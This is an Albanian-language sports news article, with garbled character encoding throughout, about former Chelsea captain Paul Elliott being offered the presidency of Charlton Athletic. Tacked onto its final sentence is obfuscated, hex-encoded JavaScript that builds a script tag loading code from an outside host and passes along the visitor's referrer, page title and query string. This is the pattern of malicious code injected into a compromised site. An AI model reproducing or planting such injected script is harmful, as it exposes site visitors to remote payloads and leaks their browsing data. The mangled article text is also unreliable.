f1_07-elliot1352276402

Sfidat pA�r Elliottin nuk kanA� tA� ndalur

Paul Elliott kurrA� nuk i A�shtA� shmangur njA� sfide si lojtar dhe tash e ka marrA� nA� konsideratA� ofertA�n pA�r t’u bA�rA� presidenti i parA� me ngjyrA� i njA� skuadre angleze, sfidA� kjo sA� cilA�s nuk do t’i shmanget gjithashtu.

Ish-mbrojtA�si, i cili ishte bA�rA� lojtari i parA� me ngjyrA� te Celticu nA� vitet ’80, pastaj i pari nA� Itali te skuadra e Pisas dhe kapiteni i parA� me ngjyrA� te Chelsea nA� fillim tA� viteve tA� viteve ’90, A�shtA� njeri i kA�rkuar.

Atij i A�shtA� ofruar rasti pA�r t’u kthyer te skuadra e fA�mijA�risA�, Charlton Athletic, por nA� postin e presidentit. Charltoni drejtohet nga trajneri Chris Powell, i cili gjithashtu A�shtA� zezak.

Skuadra e Charltonit pA�r shtatA� edicione ka luajtur me sukses nA� Premier League para se tA� bjerA� nA� kategorinA� e tretA� tA� AnglisA�. Aktualisht A�shtA� pjesA� e kategorisA� sA� dytA� dhe mbijetesa e kA�saj skuadre nA� kA�tA� rang garash A�shtA� vA�nA� nA� dyshim, pasi gjendet nA� pjesA�n e poshtme tA� tabelA�s.

PikA�risht pA�r kA�tA� arsye A�shtA� ftuar Elliott qA� tA� jetA� nA� krye tA� klubit, pasi vlerA�sohet njeri shumA� i njohur dhe i respektuar nA� botA�n e futbollit.

“Kam njA� lidhje historike me ekipin e Charltonit. Jam lindur dhe rritur nA� atA� vend dhe karrierA�n si futbollist e kam nisur pikA�risht te Charltoni”, A�shtA� shprehur Elliott. “Jam shumA� i joshur nga oferta dhe besoj se shumA� shpejt do tA� flas edhe si president i Charltonit”.

Elliott A�shtA� edhe ambasador i palodhshA�m i kampanjA�s kundA�r racizmit nA� Angli “Kick It Out”, tashmA� 20 vjet. KarrierA�n e ka mbyllur nA� moshA�n 28-vjeA�are te skuadra e Chelseat pA�r shkak tA� lA�ndimit.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}